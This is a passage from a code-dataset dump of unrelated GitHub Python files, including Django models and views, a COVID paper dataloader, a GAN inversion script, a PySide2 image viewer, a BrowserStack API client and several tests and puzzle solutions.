https://www.kaggle.com/maksimeren/covid-19-literature-clustering#\n#############################################################################\nclass FileReader:\n def __init__(self, file_path):\n with open(file_path) as file:\n content = json.load(file)\n self.paper_id = content['paper_id']\n self.abstract = []\n self.body_text = []\n # Abstract\n for entry in content['abstract']:\n self.abstract.append(entry['text'])\n # Body text\n for entry in content['body_text']:\n self.body_text.append(entry['text'])\n self.abstract = '\\n'.join(self.abstract)\n self.body_text = '\\n'.join(self.body_text)\n def __repr__(self):\n return f'{self.paper_id}: {self.abstract[:200]}... 
{self.body_text[:200]}...'\n \n\n\nclass Covid19AI2MetaData(Data):\n def __init__(self):\n super(Covid19AI2MetaData, self).__init__()\n \n def __len__(self):\n return len(self.meta_df)\n \n def __getitem__(self, item):\n return self.meta_df.iloc[item, :].values.tolist()\n \n def collumn_info(self):\n return list(self.data.columns)\n \n def download(self, path_or_url, **kwargs):\n meta_data_path = f'{path_or_url}/metadata.csv'\n self.meta_df = pd.read_csv(meta_data_path, dtype={'pubmed_id': str,\n 'Microsoft Academic Paper ID': str,\n 'doi': str})\n self.data = self.meta_df\n \n \n\n\nclass Covid19AI2Paper(Data):\n def __init__(self):\n super(Covid19AI2Paper, self).__init__()\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, item):\n return self.data.iloc[item, :].values.tolist()\n \n def download(self, path_or_url, **kwargs):\n meta_df = kwargs['meta_df']\n all_json = glob.glob(f'{path_or_url}/**/*.json', recursive=True)\n\n dict_ = {'paper_id': [], 'doi': [], 'abstract': [], 'body_text': [], 'authors': [], 'title': [], 'journal': [],\n 'abstract_summary': []}\n\n for idx, entry in enumerate(all_json):\n if idx % (len(all_json) // 10) == 0:\n print(f'Processing index: {idx} of {len(all_json)}')\n try:\n content = FileReader(entry)\n except Exception as e:\n continue\n\n meta_data = meta_df.loc[meta_df['sha'] == content.paper_id]\n # no metadata, skip this paper\n if len(meta_data) == 0:\n continue\n dict_['abstract'].append(content.abstract)\n dict_['paper_id'].append(content.paper_id)\n dict_['body_text'].append(content.body_text)\n dict_['title'].append(meta_data['title'].values[0])\n dict_['journal'].append(meta_data['journal'].values[0])\n dict_['authors'].append(meta_data['authors'].values[0])\n dict_['doi'].append(meta_data['doi'].values[0])\n \n if len(content.abstract) == 0:\n # no abstract provided\n dict_['abstract_summary'].append(\"Not provided.\")\n self.data = pd.DataFrame(dict_,\n columns=['paper_id', 'doi', 'abstract', 'body_text', 'authors', 'title', 'journal',\n 'abstract_summary'])\n\n def column_info(self, **kwargs):\n return self.data.columns\n \n \n","repo_name":"bigheiniu/COVID-19-Dataloaders","sub_path":"Academic/Covid19AI2.py","file_name":"Covid19AI2.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"30545702197","text":"#! 
/usr/bin/env python3\n\nfrom utils import load_data\n\n\ndef main():\n # Read input data\n depths = load_data()\n\n # Count the number of times the depth increases, per rolling window\n windowed_step_downs = (depths.rolling(window=3).sum().diff() > 0)[0].sum()\n\n # Print solution\n print(f\"The windowed depth measurement increases {windowed_step_downs} times.\")\n\n return windowed_step_downs\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jwalton3141/AdventOfCode21","sub_path":"day01/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18796395512","text":"import torch \nimport torch.nn as nn\nimport torchvision.utils as vutils\nimport torchvision.transforms as transforms\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom ellipses import EllipsesDataset\nfrom network.Generator import Generator\nfrom tqdm import tqdm\nfrom skimage.transform import radon, iradon\n\n\nimg_list = []\ndevice = torch.device(\"cuda\" if (torch.cuda.is_available()) else \"cpu\")\npath = \"trained_models/gen.pth\"\nnetG = Generator(128, 64, 1).to(device)\nnetG.load_state_dict(torch.load(path))\n\nnoise = torch.randn(1, 128, 1, 1, device = device)\nfake = netG(noise)\nprint(fake.shape)\n\nimage_template = np.ones((64, 64))\n\nellipse_dataset = EllipsesDataset(image_template = image_template, n_samples = 1, mode=\"train\", seed = 7) #56 1,2,5,7\n\n\nz = torch.nn.parameter.Parameter(torch.randn(70, 128, 1, 1, device = device))\noptimizer = torch.optim.Adam([z], lr=0.1)\n\nellipse = torch.from_numpy(ellipse_dataset[0][0]).unsqueeze(0).to(device)\n\n# return the biggest value in ellipse tensor\nmax_value = torch.max(ellipse)\n\n# Normalise the ellipse tensor\nellipse = ellipse/max_value\n\ngt_ellipse = ellipse\n\ngaussian_blur = transforms.GaussianBlur(kernel_size=5, sigma=(0.1, 2.0))\nellipse = gaussian_blur(ellipse)\n\nellipse_numpy = ellipse.cpu().detach().squeeze(0).numpy()\n\nviews_theta = np.linspace(0., 180., 30, endpoint=False)\nmeasured = radon(ellipse_numpy, theta=views_theta, circle=True)\nfbp = iradon(measured, theta=views_theta, circle=True)\nmax_value_fbp = np.max(fbp)\nfbp = fbp/max_value_fbp\n\nfor i in tqdm(range(1000)):\n \n optimizer.zero_grad()\n reconstruction = netG(z)\n loss = torch.nn.functional.mse_loss(reconstruction[0], ellipse)\n loss.backward()\n optimizer.step()\n\n\nmax_reconstruction = torch.max(reconstruction[0][0])\nreconstruction[0][0] = reconstruction[0][0]/max_reconstruction\n\n\n\nfig = plt.figure(figsize=(10, 10))\nfig.add_subplot(1, 3, 1)\nplt.imshow(reconstruction[0][0].cpu().detach().numpy(), cmap='gray')\nplt.colorbar(label=\"colour bar\", orientation=\"horizontal\")\nplt.title(\"GAN inversion\")\n\nfig.add_subplot(1, 3, 3)\nplt.imshow(gt_ellipse[0].cpu().detach().numpy(), cmap='gray')\nplt.colorbar(label=\"colour bar\", orientation=\"horizontal\")\nplt.title(\"Ground truth\")\n\nfig.add_subplot(1, 3, 2)\nplt.imshow(fbp, cmap='gray')\nplt.colorbar(label=\"colour bar\", orientation=\"horizontal\")\nplt.title(\"FBP\")\n\nplt.show()\n\n\n\n\n \n\n\n\n","repo_name":"OscarL63/Generative-Networks-for-Sparsity-Regularisation","sub_path":"Generative_Regularisation/invert_generator.py","file_name":"invert_generator.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30218140894","text":"#!/usr/bin/env python\n# 
coding=utf-8\n'''\n@描述: 显示图片\n@版本: V1_0\n@作者: LiWanglin\n@创建时间: 2020.02.16\n@最后编辑人: LiWanglin\n@最后编辑时间: 2020.02.18\n'''\n\n\nimport cv2\n\nfrom PySide2.QtWidgets import QGraphicsPixmapItem, QGraphicsScene, QGraphicsView\nfrom PySide2.QtGui import QImage, QPixmap\nfrom PySide2.QtCore import QPoint, Qt, Signal\n\n\nclass ModifyQGraphicsView(QGraphicsView):\n \"\"\"改进 QGraphicsView 类\n\n 由于 QGraphicsView 类没有与 mouseMoveEvent() 相关的信号,因而无法定义槽函数于此事件关联。为此,\n 从 QGraphicsView 类集成定义一个类 QGraphicsView 类,实现鼠标移动事件函数 mouseMoveEvent() 的处理,\n 并把事件转换为自定义信号,这样就可以在程序里面设计槽函数响应这些鼠标事件。\n\n @属性说明:\n mouse_move:定义一个鼠标移动信号\n\n @方法说明:\n mouseMoveEvent():鼠标移动事件\n\n \"\"\"\n def __init__(self, parent=None, image_data = None):\n super().__init__(parent)\n\n self._image_data = image_data\n\n if self._image_data is not None:\n # 获取图片信息\n self._image_shape = len(self._image_data.shape)\n self._image_h, self._image_w = self._image_data.shape[:2]\n\n mouse_move = Signal(QPoint) # 定义一个鼠标移动信号\n mouse_clicked = Signal(QPoint) # 定义一个鼠标点击信号\n\n def mouseMoveEvent(self, event): \n '''鼠标移动事件\n\n 鼠标移动事件\n\n @参数说明: \n point:当前鼠标所在的坐标点\n\n @返回值: \n 无\n\n @注意: \n 无\n ''' \n point = event.pos() \n self.mouse_move.emit(point) #发射信号\n super().mouseMoveEvent(event)\n\n def mousePressEvent(self, event):\n '''鼠标点击事件\n\n 鼠标点击事件\n\n @参数说明: \n point:当前鼠标所在的坐标点\n\n @返回值: \n 无\n\n @注意: \n 无\n ''' \n if(event.button() == Qt.LeftButton):\n point = event.pos()\n self.mouse_clicked.emit(point) #发射信号 \n super().mousePressEvent(event)\n\n def scanf_image_data(self, image_data):\n ''' 获得图片数据,并获取图片属性\n\n @参数说明: \n image_data :图片数据\n\n @返回值: \n 无\n\n @注意: \n 无\n '''\n self._image_data = image_data\n\n # 获取图片信息\n self._image_shape = len(self._image_data.shape)\n self._image_h, self._image_w = self._image_data.shape[:2]\n\n def dispaly_image(self):\n '''在 ModifyQGraphicsView 显示一张图片\n\n 在 ModifyQGraphicsView 显示一张图片 \n\n @参数说明: \n 无\n\n @返回值: \n 无\n\n @注意: \n 无\n '''\n\n # 根据图片的维度,进行不同的处理\n if self._image_shape is 2:\n # 如果是二维灰度图片,读取方式为QImage.Format_Grayscale8\n temp_q_image = QImage(self._image_data, self._image_h ,\n self._image_w, QImage.Format_Grayscale8)\n elif self._image_shape is 3:\n # 由于QImage读取方式为RGB,但 opencv 读取图片形式为BGR,所以要进行色彩转换\n temp_q_image = cv2.cvtColor(self._image_data, cv2.COLOR_BGR2RGB)\n\n # 如果是三维灰度图片,读取方式为QImage.Format_RGB888\n temp_q_image = QImage(temp_q_image, self._image_h, self._image_w, \n QImage.Format_RGB888)\n else:\n return None\n \n # 2. 像素映射\n temp_q_image_pix = QPixmap.fromImage(temp_q_image) # 将给定图像转换为像素映射\n\n # 3. 在graphics_view中显示图片\n temp_item = QGraphicsPixmapItem(temp_q_image_pix)\n temp_q_sece = QGraphicsScene()\n temp_q_sece.addItem(temp_item) \n self.setScene(temp_q_sece)\n temp_q_sece.clearSelection()","repo_name":"WanglinLi595/OpenCV_Function_Demonstration","sub_path":"src/tools/modify_graphics.py","file_name":"modify_graphics.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73623344850","text":"from __future__ import annotations\nimport functions.function_node as function_node\nimport functions.bool_evaluation_set as bool_evaluation_set\nfrom typing import TypeVar\n\nT = TypeVar('T')\n\nclass ConditionalFunction:\n \"\"\"ConditionalFunction represents a callable that has a conditional.\n\n ConditionalFunction represents a callable (callback) that has a \n conditional. The callback will not execute if the requirement\n callback returns False. 
No error is thrown if False is returned\n by the requirement function.\n\n\n Attributes:\n function (callable[..., T]): The primary function.\n requirement (callable[None, bool]): The requirement function\n that returns True if the primary function can run and False\n otherwise.\n \"\"\"\n def __init__(self, function: callable[..., T], requirement: callable[None, bool]):\n \"\"\"Initializes a ConditonalFunction with the given functions.\n\n Args:\n function (callable[..., T]): The primary function.\n requirement (callable[None, bool]): The requirement function\n that returns True if the primary function can run and False\n otherwise.\n \"\"\"\n self.function: callable[..., T] = function\n self.requirement: callable[None, bool] = requirement\n\n def __call__(self) -> T:\n \"\"\"Runs the primary function if the requirement is satisfied.\n\n Runs the primary function if the requirement is satisfied. if\n the requirement is not satisfied, the return value is None.\n This function does not discern the source of the None.\n\n Returns:\n The return value of the primary function.\n \"\"\"\n if self.requirement():\n return self.function()\n\n @staticmethod\n def generate(function: callable[..., T], data: dict[str, any], inferred: dict[str, str], literal: dict[str, any], requirements: list[list[dict[str, any]]]) -> ConditionalFunction:\n \"\"\"Creates a ConditionalFunction from the expected JSON data.\n\n Creates a ConditionaFunction from the expected JSON data. See\n assets/templates/move_template.json for details on what the\n expected JSON data is. \n\n Note:\n A literal parameter of key/name 'cache' is automatically\n inserted and it stores the data passed into this generate\n function.\n \n Args:\n function (callable[..., T]): The primary function.\n data (dict[str, any]): The dictionary that inferred \n parameters are sourced from.\n inferred (dict[str, str]): The inferred parameters\n (inferred's dict values will be used as keys to obtain\n their new value from data and inferred's dict keys will\n remain the same) that are passed into the function.\n literal (dict[str, any]): literal parameters (those that \n do not come from data) to pass into the function.\n requirements (list[list[dict[str, any]]]): The \n requirements for the primary function to be executed.\n\n Returns:\n The generated ConditionalFunction.\n \"\"\"\n literal['cache'] = data\n \n return ConditionalFunction(\n function_node.FunctionNode(\n function, \n lambda : {key: data[value] for key, value in inferred.items()} | literal\n ), bool_evaluation_set.BoolEvaluationSet.generate(\n data,\n requirements\n )\n )","repo_name":"HaixD/Python-Turn-based-Game","sub_path":"functions/conditional_function.py","file_name":"conditional_function.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10242795379","text":"\r\n# Design python application which contains two threads named as thread1 and thread2.\r\n# Thread1 display 1 to 50 on screen and thread2 display 50 to 1 in reverse order on\r\n# screen. 
After execution of thread1 gets completed then schedule thread2.\r\n\r\n###############################################################################################\r\n\r\nimport threading\r\n\r\ndef Thread1(iNo,kulup):\r\n    kulup.acquire()\r\n    print(\"Numbers in given range : \")\r\n    for i in range(1,(iNo+1)):\r\n        print(i)\r\n\r\n    kulup.release()\r\n\r\ndef Thread2(iNo,kulup):\r\n    kulup.acquire()\r\n    print(\"Numbers in given range in reverse order : \")\r\n    for i in range(iNo,0,-1):\r\n        print(i)\r\n\r\n    kulup.release()\r\n\r\ndef main():\r\n    print(\"Enter number : \")\r\n    iValue = int(input())\r\n\r\n    kulup = threading.Lock()\r\n    t1 = threading.Thread(target = Thread1, args = (iValue,kulup,))\r\n    t2 = threading.Thread(target = Thread2, args = (iValue,kulup,))\r\n\r\n    t1.start()\r\n    t2.start()\r\n\r\n    t1.join()\r\n    t2.join()\r\n\r\n\r\nif __name__==\"__main__\":\r\n    main()","repo_name":"meghamule2001/Python-Programs","sub_path":"Assignment8/Assignment8_5.py","file_name":"Assignment8_5.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70467146771","text":"from django.db import models\nfrom datetime import datetime\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\n\n\nclass Profile(models.Model):\n    user = models.OneToOneField(User, on_delete=models.CASCADE)\n    phone = models.CharField(max_length=13, blank=False)\n    expiredAt = models.DateTimeField(blank=True)\n\n    def __str__(self):\n        return self.user.email\n\n    class Meta:\n        verbose_name_plural = 'Profiles'\n\n\nclass Plan(models.Model):\n    name = models.CharField(max_length=128)\n    price = models.CharField(max_length=128)\n    period_days = models.IntegerField()\n    money_count = models.IntegerField()\n\n    def __str__(self):\n        return f'Plan id={self.id}, plan={self.name}, price={self.price}'\n\n\nclass Order(models.Model):\n    user = models.ForeignKey(User, null=True, on_delete=models.CASCADE)\n    plan = models.ForeignKey(Plan, null=True, on_delete=models.SET_NULL)\n    date_transaction = models.DateTimeField(auto_now_add=True)\n    comment = models.TextField(blank=True)\n    confirmed = models.BooleanField(default=False)\n    date_start = models.DateTimeField()\n    date_expired = models.DateTimeField()\n\n    @property\n    def get_plan_days(self):\n        return int(self.plan.period_days)\n\n    def __str__(self):\n        return f'Order id={self.id}, plan={self.plan.name}, user={self.user.first_name}'\n\n\nclass Mark(models.Model):\n    name = models.CharField(max_length=128, blank=False)\n    ria_id = models.IntegerField(null=True)\n    eng = models.CharField(max_length=128, blank=True)\n\n    def __str__(self):\n        return self.name\n\n\nclass Model(models.Model):\n    name = models.CharField(max_length=128, blank=False)\n    mark = models.ForeignKey(Mark, null=True, on_delete=models.CASCADE)\n    ria_id = models.IntegerField(null=True)\n    eng = models.CharField(max_length=128, blank=True)\n\n    def __str__(self):\n        return self.name\n\n\nclass Location(models.Model):\n    name = models.CharField(max_length=128, blank=False)\n\n    def __str__(self):\n        return self.name\n\n\nclass Color(models.Model):\n    name = models.CharField(max_length=64)\n\n    def __str__(self):\n        return self.name\n\n\nclass Gearbox(models.Model):\n    name = models.CharField(max_length=64)\n\n    def __str__(self):\n        return self.name\n\n\nclass Body(models.Model):\n    name = models.CharField(max_length=64)\n\n    def __str__(self):\n        return self.name\n\n\nclass Fuel(models.Model):\n    name = 
models.CharField(max_length=64)\n\n def __str__(self):\n return self.name\n\n\nclass SellerPhone(models.Model):\n phone = models.CharField(max_length=1024, unique=True)\n\n\nclass Car(models.Model):\n model = models.ForeignKey(Model, null=True, on_delete=models.SET_NULL)\n gearbox = models.ForeignKey(Gearbox, null=True, on_delete=models.SET_NULL)\n location = models.ForeignKey(Location, null=True, on_delete=models.SET_NULL)\n fuel = models.ForeignKey(Fuel, null=True, on_delete=models.SET_NULL)\n color = models.ForeignKey(Color, null=True, on_delete=models.SET_NULL)\n year = models.IntegerField(null=True)\n mileage = models.IntegerField(null=True)\n engine = models.FloatField(null=True)\n description = models.CharField(max_length=1024, null=True)\n phone = models.ForeignKey(SellerPhone, null=True, on_delete=models.SET_NULL)\n body = models.ForeignKey(Body, null=True, on_delete=models.SET_NULL)\n image = models.CharField(max_length=256)\n dtp = models.BooleanField(default=False)\n createdAt = models.DateTimeField()\n updatedAt = models.DateTimeField(blank=True)\n last_site_updatedAt = models.DateTimeField(blank=True)\n sold = models.BooleanField(default=False)\n cleared = models.BooleanField(default=True)\n olx_link = models.URLField(blank=True)\n ria_link = models.URLField(blank=True)\n ab_link = models.URLField(blank=True)\n rst_link = models.URLField(blank=True)\n\n class Meta:\n verbose_name_plural = 'Cars'\n\n def __str__(self):\n return f' IMG_7071.JPG\r\n image_name = str(request.path).split('/')[3]\r\n # переменная для поиска поля в БД\r\n dbSearch_str = 'data/' + image_name\r\n # объект поля для HTML\r\n exist = False\r\n # проверка существования записи в БД для этого фото\r\n try:\r\n img = Image.objects.get(image=dbSearch_str)\r\n exist = True\r\n except:\r\n pass\r\n # полный путь до фото\r\n full_path = media_path + '/data/' + image_name\r\n Result = None\r\n if exist == True:\r\n if img.neuro_result == 'None':\r\n # вызов нейросети для обработки изображения\r\n os.system('python ' + neuro_path + '/classify_image.py --image_file ' + full_path)\r\n # открыть файл с выводом нейросети\r\n result_file = open(neuro_path + '/out.txt', 'r')\r\n # считать файл и разделить его по строкам (\":\" - конец строки) для HTML\r\n Result = result_file.read()\r\n # записать в БД ответ нейросети\r\n img.neuro_result = Result\r\n img.save()\r\n # закрыть файл\r\n result_file.close()\r\n else:\r\n Result = img.neuro_result\r\n # разделяй и влавствуй\r\n Result = Result.split(':')\r\n # открыть файл с помощью pillow, для масштабирования\r\n pimg = pil_img.open(full_path)\r\n # получить коефициент для масштабирования\r\n k = pimg.size[1] / 400\r\n print(k)\r\n # задать высоту и ширину изображения для HTML\r\n hgt = int(pimg.size[1] / k)\r\n wdt = int(pimg.size[0] / k)\r\n # приберём за собой с:\r\n del pimg\r\n return render(request, 'uploadImage/result.html', locals())\r\n","repo_name":"Fr1m3n/EcoStav-1","sub_path":"all/Upload/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41126771393","text":"import pytest\nfrom fastapi.testclient import TestClient\n\n\n@pytest.mark.parametrize(\n \"test_client\", [{\"ui\": {\"enabled\": True, \"path\": \"/ui\"}}], indirect=True\n)\ndef test_ui_starts_in_the_given_endpoint(test_client: TestClient) -> None:\n response = test_client.get(\"/ui\")\n assert response.status_code == 
200\n","repo_name":"benito-camarillo/PrivateGPT","sub_path":"tests/ui/test_ui.py","file_name":"test_ui.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35993966395","text":"from djangojs.views import JasmineView\n\n\nclass SubstitutJasmineView(JasmineView):\n js_files = (\n 'js/libs/jquery-1.10.1.js',\n 'js/init.js',\n 'js/exceptions.js',\n 'js/recipe.js',\n 'js/responsive.js',\n 'js/storage.js',\n 'js/vote.js',\n 'js/substitut.js',\n 'js/test/*.spec.js'\n )\n","repo_name":"dessibelle/substitut.se","sub_path":"project/recipes/views/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27937125726","text":"from bsapi import Settings, Api\n\n\nclass Device:\n \"\"\"\n Represents a supported device on BrowserStack\n\n :param str os: The OS running on the device\n :param str os_version: The version number for the devices OS\n :param str device: The name of the device\n :param str real_mobile: Is the device a real phone\n \"\"\"\n def __init__(self, os=None, os_version=None, device=None, real_mobile=None):\n self.os = os\n self.os_version = os_version\n self.device = device\n self.real_mobile = real_mobile\n\n\nclass DevicesApi(Api):\n \"\"\"Class for interacting with the Devices REST endpoint on BrowserStack\"\"\"\n @classmethod\n def get_device_list(cls):\n \"\"\"\n Gets a list of devices that support Appium on BrowserStack\n\n :return: List of supported devices\n :rtype: list[:class:`bsapi.app_automate.appium.devices.Device`]\n \"\"\"\n url = f\"{Settings.base_url}/app-automate/devices.json\"\n\n response = cls.http.get(url, **Settings.request())\n\n if response.status_code == 200:\n rj = response.json()\n return [\n Device(\n os=d[\"os\"],\n os_version=d[\"os_version\"],\n device=d[\"device\"],\n real_mobile=d[\"realMobile\"]\n )\n for d\n in rj\n ]\n else:\n response.raise_for_status()\n","repo_name":"fictitiouswizard/bsapi","sub_path":"bsapi/app_automate/appium/devices.py","file_name":"devices.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25971112475","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# import numpy as np\n# import matplotlib.pyplot as plt\n\nimport math\n\n\n# def drawTriangle(a, b, c, color):\n# X = np.array([a, b, c])\n# Y = [color] * 3\n\n# plt.figure()\n# plt.scatter(X[:, 0], X[:, 1], s = 170, color = Y[:])\n\n# t1 = plt.Polygon(X[:3,:], color=Y[0])\n# plt.gca().add_patch(t1)\n\n# def drawLine(a, b):\n# x_values = [a[0], b[0]]\n# y_values = [a[1], b[1]]\n# plt.plot(x_values, y_values)\n\n# def point(coords, cor, size):\n# plt.plot(coords[0], coords[1], marker=\"o\", markersize=size, markeredgecolor=cor, markerfacecolor=\"green\")\n\ndef get_mirror_coordinates(\n size,\n pos,\n rel_cg,\n distance_count,\n ):\n [w, h] = size\n [px, py] = pos\n xr = (w - px) * 2\n xl = px * 2\n\n x = [px - rel_cg[0]] * (distance_count * 2 + 1)\n\n for i in range(distance_count + 1, distance_count * 2 + 1):\n x[i] = (x[i - 1] + xr if (i - distance_count - 1) % 2 == 0 else x[i - 1] + xl)\n\n for i in range(distance_count - 1, -1, -1):\n x[i] = (x[i + 1] - xl if (distance_count - 1 - i) % 2 == 0 else x[i + 1] - xr)\n\n dyU = (h - py) * 2\n dyD = py * 2\n y = [py - rel_cg[1]] * (distance_count * 2 + 1)\n\n for i in range(distance_count + 1, 
distance_count * 2 + 1):\n y[i] = (y[i - 1] + dyU if (i - distance_count - 1) % 2 == 0 else y[i - 1] + dyD)\n\n for i in range(distance_count - 1, -1, -1):\n y[i] = (y[i + 1] - dyD if (distance_count - 1 - i) % 2 == 0 else y[i + 1] - dyU)\n\n return (x, y)\n\n\ndef solution(\n dimensions,\n your_position,\n trainer_position,\n distance,\n ):\n min_d = min(dimensions)\n distance_count = distance // min_d + 1\n\n (px, py) = get_mirror_coordinates(dimensions, your_position,\n your_position, distance_count)\n (tx, ty) = get_mirror_coordinates(dimensions, trainer_position,\n your_position, distance_count)\n\n angle_dist = {}\n for _x in px:\n for _y in py:\n if _x == 0 and _y == 0:\n continue\n\n d = math.hypot(_y, _x)\n\n if d <= distance:\n beam = math.atan2(_y, _x)\n if beam in angle_dist:\n if d < angle_dist[beam]:\n angle_dist[beam] = d\n else:\n angle_dist[beam] = d\n\n res = set()\n for _x in tx:\n for _y in ty:\n d = math.hypot(_y, _x)\n if d <= distance:\n beam = math.atan2(_y, _x)\n if beam in angle_dist:\n if d < angle_dist[beam]:\n angle_dist[beam] = d\n res.add(beam)\n else:\n angle_dist[beam] = d\n res.add(beam)\n return len(res)\n\n\n# print solution([3, 2], [1, 1], [2, 1], 4)\n\n# print(solution([300,275], [150,150], [185,100], 500))\n# print(solution([2,5], [1,2], [1,4], 11))\n# print(solution([10,10], [4,4], [3,3], 5000))\n","repo_name":"edrcosta/foobar-challenge","sub_path":"test_7/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33606978682","text":"import pytest\n\n\ndef enable_version_experiment(experiments3):\n for exp_name in [\n 'combo_outer_taximeter_version',\n 'combo_taximeter_version',\n ]:\n experiments3.add_config(\n match={\n 'predicate': {'type': 'true'},\n 'enabled': True,\n 'applications': [\n {'name': 'taximeter', 'version_range': {'from': '8.0.0'}},\n {\n 'name': 'taximeter-ios',\n 'version_range': {'from': '1.0.0'},\n },\n ],\n },\n name=exp_name,\n consumers=['candidates/filters'],\n clauses=[\n {\n 'value': {'enabled': True},\n 'predicate': {'type': 'true'},\n 'enabled': True,\n },\n ],\n default_value={'enabled': False},\n )\n\n\n@pytest.mark.parametrize(\n 'zone_id, allowed_classes, combo_only_data, expected_candidates',\n [\n (\n 'moscow',\n ['econom'],\n {'order': {'calc': {'alternative_type': 'combo_inner'}}},\n [{'dbid_uuid': 'dbid0_uuid2'}],\n ),\n (\n 'moscow',\n ['econom'],\n {\n 'order': {'calc': {'alternative_type': 'combo_inner'}},\n 'combo': {'need_free': True},\n },\n [\n {'dbid_uuid': 'dbid0_uuid0'},\n {'dbid_uuid': 'dbid0_uuid1'},\n {'dbid_uuid': 'dbid0_uuid2'},\n ],\n ),\n (\n 'moscow',\n ['econom'],\n {'order': {'calc': {'alternative_type': 'combo_outer'}}},\n [\n {'dbid_uuid': 'dbid0_uuid0'},\n {'dbid_uuid': 'dbid0_uuid1'},\n {'dbid_uuid': 'dbid0_uuid2'},\n ],\n ),\n (\n 'moscow',\n ['econom'],\n {},\n [\n {'dbid_uuid': 'dbid0_uuid0'},\n {'dbid_uuid': 'dbid0_uuid1'},\n {'dbid_uuid': 'dbid0_uuid2'},\n ],\n ),\n ],\n)\n@pytest.mark.config(\n ROUTER_SELECT=[{'routers': ['linear-fallback']}],\n CANDIDATES_FILTER_COMBO_FREE_ENABLED={\n '__default__': {'__default__': True},\n },\n)\nasync def test_combo_only(\n taxi_candidates,\n driver_positions,\n combo_contractors,\n zone_id,\n allowed_classes,\n combo_only_data,\n expected_candidates,\n experiments3,\n):\n enable_version_experiment(experiments3)\n\n await driver_positions(\n [\n {'dbid_uuid': 'dbid0_uuid0', 'position': [37.63, 55.74]},\n {'dbid_uuid': 
'dbid0_uuid1', 'position': [37.63, 55.74]},\n {'dbid_uuid': 'dbid0_uuid2', 'position': [37.63, 55.74]},\n ],\n )\n\n combo_contractors([{'dbid_uuid': 'dbid0_uuid2'}])\n\n request_body = {\n 'limit': 10,\n 'zone_id': zone_id,\n 'allowed_classes': allowed_classes,\n 'point': [37.63, 55.74],\n 'destination': [37.64, 55.73],\n }\n\n request_body.update(combo_only_data)\n\n response = await taxi_candidates.post('order-search', json=request_body)\n\n assert response.status_code == 200\n\n candidates = [\n {'dbid_uuid': candidate['id']}\n for candidate in response.json()['candidates']\n ]\n\n assert (\n sorted(candidates, key=lambda x: x['dbid_uuid']) == expected_candidates\n )\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_candidates/test_filter_combo_only.py","file_name":"test_filter_combo_only.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25215666255","text":"import sys\nimport os\nimport imageio\nfrom natsort import natsorted\n\n# Program makes an animation out of the frames stored in /frames\n\ndef readFrames(reverse):\n directory = sys.path[0] + '/frames'\n\n frames = os.listdir(directory)\n frames = natsorted(frames)\n\n frameNum = len(frames)-1\n if reverse:\n frameNum *= 2\n\n images = []\n counter = 1\n print('Reading frames started.')\n for frame in frames:\n if frame != '.gitignore':\n file = directory + f'/{frame}'\n images.append(imageio.imread(file))\n print(f'Frame {counter} done, {round(100*counter/frameNum, 2)}%.')\n counter += 1\n\n if reverse:\n frames = natsorted(frames, reverse=True)\n for frame in frames:\n if frame != '.gitignore':\n file = directory + f'/{frame}'\n images.append(imageio.imread(file))\n print(f'Frame {counter} done, {round(100*counter/frameNum, 2)}%.')\n counter += 1\n\n print('Reading frames complete.')\n return images\n\ndef createAnimation(fileName, reverse=False):\n filePath = sys.path[0]+f'/animations/{fileName}.gif'\n\n images = readFrames(reverse)\n\n print('Rendering.')\n imageio.mimsave(filePath, images, fps=24)\n print('Done.')\n\ndef clearFrames():\n directory = sys.path[0] + '/frames'\n frames = os.listdir(directory)\n for frame in frames:\n if frame != '.gitignore':\n file = directory + f'/{frame}'\n os.remove(file)","repo_name":"esakalys/power-animations","sub_path":"functions/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38291202183","text":"from sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\n\nMODEL = [\n RandomForestClassifier(),\n LogisticRegression(),\n SVC(),\n DecisionTreeClassifier(),\n]\nMODEL_TITLE = [\n \"Random Forest Classifier\",\n \"Logistic Regression\",\n \"Support Vector Classifier\",\n \"Decision Tree Classifier\",\n]\nDATASET_PATH = \"dataset/online_shoppers_intention.csv\"\nOBJECT_COLUMNS = [\"VisitorType\", \"Month\", \"Revenue\"]\nX_OBJECT_COLUMNS = 